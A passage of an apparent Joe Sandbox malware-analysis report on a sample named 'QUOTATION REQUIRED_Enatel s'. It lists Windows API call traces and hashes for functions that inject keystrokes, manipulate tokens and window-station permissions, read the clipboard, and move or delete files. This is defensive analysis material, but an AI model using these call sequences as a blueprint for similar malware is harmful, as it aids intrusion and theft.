                                                                                                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00FA49AE
                                                                                                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00FA49D4
                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00FA4A0F
                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FA4A56
                                                                                                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FA4A7E
                                                                                                                    • IsMenu.USER32(?), ref: 00FA4A97
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FA4AF2
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FA4B20
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA4B94
                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00FA4BE3
                                                                                                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00FA4C82
                                                                                                                    • wsprintfW.USER32 ref: 00FA4CAE
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FA4CC9
                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FA4CF1
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FA4D13
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FA4D33
                                                                                                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FA4D5A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    • API String ID: 4054740463-328681919
                                                                                                                    • Opcode ID: a8f7cf9ee33659b8bcf2c59b09e6e657a3b26593005ac6cce26e97c929036178
                                                                                                                    • Instruction ID: 9d9ceae37b031dd4e3e69396b36afcaff8907f052c650001a0d8903c18d155dd
                                                                                                                    • Opcode Fuzzy Hash: a8f7cf9ee33659b8bcf2c59b09e6e657a3b26593005ac6cce26e97c929036178
                                                                                                                    • Instruction Fuzzy Hash: BC1218B5900218AFEB258F24DC45FAE7BF8EF86710F144129F519DB2D1DBB4A940EB90
                                                                                                                    Function 00F2F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F2F998
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F6F474
                                                                                                                    • IsIconic.USER32(00000000), ref: 00F6F47D
                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00F6F48A
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F6F494
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F6F4AA
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F6F4B1
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F6F4BD
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F6F4CE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F6F4D6
                                                                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F6F4DE
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F6F4E1
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F4F6
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F501
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F50B
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F510
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F519
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F51E
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6F528
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00F6F52D
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00F6F530
                                                                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F6F557
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: ec4a01e8dffcbee3d6185506bf3e8b03efd4958f747f80b6fe0cf22cf33fa310
                                                                                                                    • Instruction ID: d99df8363ab17de285da8ccffb4ab3be5ec426d33cd73ffe3c78a91abbcf5def
                                                                                                                    • Opcode Fuzzy Hash: ec4a01e8dffcbee3d6185506bf3e8b03efd4958f747f80b6fe0cf22cf33fa310
                                                                                                                    • Instruction Fuzzy Hash: 25311EB1E4021CBEEB216BB59C4AFBF7E6CEB45B50F140065FA05E61D1CAB15D00BAA1
                                                                                                                    Function 00F71201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7170D
                                                                                                                      • Part of subcall function 00F716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F7173A
                                                                                                                      • Part of subcall function 00F716C3: GetLastError.KERNEL32 ref: 00F7174A
                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F71286
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F712A8
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F712B9
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F712D1
                                                                                                                    • GetProcessWindowStation.USER32 ref: 00F712EA
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00F712F4
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F71310
                                                                                                                      • Part of subcall function 00F710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F711FC), ref: 00F710D4
                                                                                                                      • Part of subcall function 00F710BF: CloseHandle.KERNEL32(?,?,00F711FC), ref: 00F710E9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                    • String ID: $default$winsta0
                                                                                                                    • API String ID: 22674027-1027155976
                                                                                                                    • Opcode ID: dd0967ec8bc0c482f7fb406924d137e8a6a6aa983c5243110a48693141dd32ae
                                                                                                                    • Instruction ID: 07a09b7c65a491e0f38da1691db03434d28a384dc50afdb6c3ea0a9fffd4bcc7
                                                                                                                    • Opcode Fuzzy Hash: dd0967ec8bc0c482f7fb406924d137e8a6a6aa983c5243110a48693141dd32ae
                                                                                                                    • Instruction Fuzzy Hash: 218191B1900208AFDF21DFA8DC49FEE7BB9FF05710F14811AF918A6150D7349958EB62
                                                                                                                    Function 00F70B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71114
                                                                                                                      • Part of subcall function 00F710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71120
                                                                                                                      • Part of subcall function 00F710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F7112F
                                                                                                                      • Part of subcall function 00F710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71136
                                                                                                                      • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F7114D
                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F70BCC
                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F70C00
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00F70C17
                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F70C51
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F70C6D
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00F70C84
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F70C8C
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F70C93
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F70CB4
                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00F70CBB
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F70CEA
                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F70D0C
                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F70D1E
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70D45
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D4C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70D55
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D5C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70D65
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D6C
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F70D78
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70D7F
                                                                                                                      • Part of subcall function 00F71193: GetProcessHeap.KERNEL32(00000008,00F70BB1,?,00000000,?,00F70BB1,?), ref: 00F711A1
                                                                                                                      • Part of subcall function 00F71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F70BB1,?), ref: 00F711A8
                                                                                                                      • Part of subcall function 00F71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F70BB1,?), ref: 00F711B7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4175595110-0
                                                                                                                    • Opcode ID: 40eb7cef07638a9b3def7fc56dd54b7cdd7e17914a06f3a38ed74fa8c003e417
                                                                                                                    • Instruction ID: 130ccdb0e2a52c69de79f305828456633327640232cb3df39ee19c46204f1b18
                                                                                                                    • Opcode Fuzzy Hash: 40eb7cef07638a9b3def7fc56dd54b7cdd7e17914a06f3a38ed74fa8c003e417
                                                                                                                    • Instruction Fuzzy Hash: 06715DB1D0020AEBDF10DFA5DC44FAEBBB8BF05310F048516F919E6291DB75A905EBA1
                                                                                                                    Function 00F8EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32(00FACC08), ref: 00F8EB29
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F8EB37
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00F8EB43
                                                                                                                    • CloseClipboard.USER32 ref: 00F8EB4F
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00F8EB87
                                                                                                                    • CloseClipboard.USER32 ref: 00F8EB91
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F8EBBC
                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00F8EBC9
                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00F8EBD1
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00F8EBE2
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F8EC22
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F8EC38
                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00F8EC44
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00F8EC55
                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F8EC77
                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8EC94
                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8ECD2
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F8ECF3
                                                                                                                    • CountClipboardFormats.USER32 ref: 00F8ED14
                                                                                                                    • CloseClipboard.USER32 ref: 00F8ED59
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420908878-0
                                                                                                                    • Opcode ID: 6f53a7b8cd238fbbf62951eda067b05a7b165b82eed5b076f59a486c45f9c835
                                                                                                                    • Instruction ID: 52889095c4e241d65106e6b3c1d5d70a5e1722d531f2b2fb6fa9d196f74cf8a0
                                                                                                                    • Opcode Fuzzy Hash: 6f53a7b8cd238fbbf62951eda067b05a7b165b82eed5b076f59a486c45f9c835
                                                                                                                    • Instruction Fuzzy Hash: 8861E2752043059FD300EF20CC94FAAB7E4AF85724F14451DF856972A2DB31ED49EBA2
                                                                                                                    Function 00F8698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F869BE
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F86A12
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F86A4E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F86A75
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F86AB2
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F86ADF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                    • Opcode ID: 37ceb1a3db8184f18f50321b53ff2bd246a59aef8ab4eb5195d210f17433fb1e
                                                                                                                    • Instruction ID: a3c528f4309eb931faf97f56d960552d1edd3819ee3f5fd56c519c0752b9aa79
                                                                                                                    • Opcode Fuzzy Hash: 37ceb1a3db8184f18f50321b53ff2bd246a59aef8ab4eb5195d210f17433fb1e
                                                                                                                    • Instruction Fuzzy Hash: 24D14072508300AEC714EBA4DC91EEBB7ECAF88704F44491DF585D7191EB78DA48DBA2
                                                                                                                    Function 00F89642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F89663
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F896A1
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F896BB
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F896D3
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F896DE
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F896FA
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F8974A
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00FD6B7C), ref: 00F89768
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F89772
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F8977F
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F8978F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                    • Opcode ID: abe225f7383ba20f00f7384ea6b6f4bcdf711830e46962cc63d157ad854204f6
                                                                                                                    • Instruction ID: 30982d149637369aecd6eb03cf89c65885842e9e1f44a758bfef093a3e5d6029
                                                                                                                    • Opcode Fuzzy Hash: abe225f7383ba20f00f7384ea6b6f4bcdf711830e46962cc63d157ad854204f6
                                                                                                                    • Instruction Fuzzy Hash: 8831C3729042196ADF10AFB4DC08AEE77AC9F4A330F184156F815E21A0EB74DE40AB64
                                                                                                                    Function 00F8979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F897BE
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F89819
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F89824
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F89840
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F89890
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00FD6B7C), ref: 00F898AE
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F898B8
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F898C5
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F898D5
                                                                                                                      • Part of subcall function 00F7DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F7DB00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                    • Opcode ID: 84478d7b02675e68fd4e56005578043a06125f77c139f72fdd22ea9ec99f051f
                                                                                                                    • Instruction ID: 3546caae4ab36c7322281659a151a232119e9eab4564cf27627227bbc9475322
                                                                                                                    • Opcode Fuzzy Hash: 84478d7b02675e68fd4e56005578043a06125f77c139f72fdd22ea9ec99f051f
                                                                                                                    • Instruction Fuzzy Hash: DA31A37290461A6EDF10BFB4DC48AEE77AC9F46334F584156E814E21A0DBB4DE44EB60
                                                                                                                    Function 00F88195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00F88257
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F88267
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F88273
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F88310
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88324
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88356
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F8838C
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88395
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1464919966-438819550
                                                                                                                    • Opcode ID: 86463a0f87019d8482a1a76aa71e7ee5d46c68496a9b52977904d161bd80a254
                                                                                                                    • Instruction ID: e04bfd8c704ab5405b3ad6e3a424402e8e83a966c9f3c2b4923d10a5c7723323
                                                                                                                    • Opcode Fuzzy Hash: 86463a0f87019d8482a1a76aa71e7ee5d46c68496a9b52977904d161bd80a254
                                                                                                                    • Instruction Fuzzy Hash: A2615BB25043059FCB10EF64C84499EB3E9FF89360F44891EF98987251EB35E946DB92
                                                                                                                    Function 00F7D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F13A97,?,?,00F12E7F,?,?,?,00000000), ref: 00F13AC2
                                                                                                                      • Part of subcall function 00F7E199: GetFileAttributesW.KERNEL32(?,00F7CF95), ref: 00F7E19A
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F7D122
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F7D1DD
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00F7D1F0
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7D20D
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7D237
                                                                                                                      • Part of subcall function 00F7D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F7D21C,?,?), ref: 00F7D2B2
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00F7D253
